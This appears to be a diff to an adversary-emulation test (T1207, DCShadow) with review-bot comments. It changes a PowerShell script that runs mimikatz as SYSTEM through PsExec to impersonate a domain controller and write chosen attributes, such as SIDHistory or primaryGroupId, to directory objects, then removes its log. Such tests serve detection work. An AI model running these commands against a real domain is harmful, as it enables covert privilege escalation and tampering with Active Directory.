diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 044e72a5..8f7cce9c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -38149,11 +38149,20 @@ defense-evasion:
       supported_platforms:
       - windows
       input_arguments:
-        user:
-          description: Targeted user (for machine account do not forget to add final
+        object:
+          description: Targeted object (for machine account do not forget to add final
             '$')
           type: string
-          default: CLIENT1$
+          default: bruce.wayne
+        attribute:
+          description: 'Object attribute to edit, interesting ones: badpwdcount, primaryGroupId,
+            SIDHistory...'
+          type: string
+          default: badpwdcount
+        value:
+          description: Value to assign to object attribute
+          type: string
+          default: 9999
         mimikatz_path:
           description: Mimikatz windows executable
           type: path
@@ -38196,7 +38205,7 @@ defense-evasion:
           # starting fake DC server, as SYSTEM (required)
           $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log"
           Remove-Item $dc_output_file -ErrorAction Ignore
-          $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`""
+          $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`""
           $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam"
 
           # wait for fake DC server to be ready...
@@ -38210,6 +38219,7 @@ defense-evasion:
           Write-Host "`nOutput from fake DC server:"
           Get-Content $dc_output_file
 
+          Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it
           Remove-Item $dc_output_file -ErrorAction Ignore
 
           Write-Host "End of DCShadow"
diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md
index 83588369..8d3ae33f 100644
--- a/atomics/T1207/T1207.md
+++ b/atomics/T1207/T1207.md
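Review bot: The three placeholders added to the `$mimikatzParam` line are substituted verbatim into a string that is itself nested inside the `-ArgumentList` handed to `cmd.exe /c`, so an `object`, `attribute` or `value` containing a double quote, a backtick or a cmd.exe metacharacter would terminate the quoted `lsadump::dcshadow` argument early and the test would fail in a confusing way instead of rejecting the input; `#{user}` had the same exposure, but the two new inputs are free-form where the old `badpwdcount`/`9999` were fixed literals. A one-line guard ahead of it keeps the failure explicit, e.g. `foreach ($v in @('#{object}', '#{attribute}', '#{value}')) { if ($v -match '[`"&|^]') { throw "unsupported character in input: $v" } }`. The executor script this line belongs to starts before and continues after the hunk, and the same line appears in the T1207.md hunk below.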
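Review bot: The added `Start-Sleep 1` before `Remove-Item $dc_output_file` is a fixed delay standing in for "the log is no longer locked", so on a slower host the delete can still fail and, because of `-ErrorAction Ignore`, fail silently, leaving the mimikatz log behind in `$env:TEMP`. A short bounded retry is just as cheap and removes the guess: `for ($i = 0; $i -lt 5 -and (Test-Path $dc_output_file); $i++) { Remove-Item $dc_output_file -ErrorAction SilentlyContinue; if (Test-Path $dc_output_file) { Start-Sleep 1 } }`. The surrounding executor script continues outside the hunk, and the matching T1207.md hunk below carries the same line.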
@@ -33,7 +33,9 @@ The easiest is to run elevated and as a Domain Admin user.
 #### Inputs:
 
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| user | Targeted user (for machine account do not forget to add final '$') | string | CLIENT1$|
+| object | Targeted object (for machine account do not forget to add final '$') | string | bruce.wayne|
+| attribute | Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory... | string | badpwdcount|
+| value | Value to assign to object attribute | string | 9999|
 | mimikatz_path | Mimikatz windows executable | path | $env:TEMP\mimikatz\x64\mimikatz.exe|
 | psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe|
@@ -45,7 +47,7 @@ The easiest is to run elevated and as a Domain Admin user.
 # starting fake DC server, as SYSTEM (required)
 $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log"
 Remove-Item $dc_output_file -ErrorAction Ignore
-$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`""
+$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`""
 $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam"
 
 # wait for fake DC server to be ready...
@@ -59,6 +61,7 @@ Wait-Process $dc
 Write-Host "`nOutput from fake DC server:"
 Get-Content $dc_output_file
 
+Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it
 Remove-Item $dc_output_file -ErrorAction Ignore
 
 Write-Host "End of DCShadow"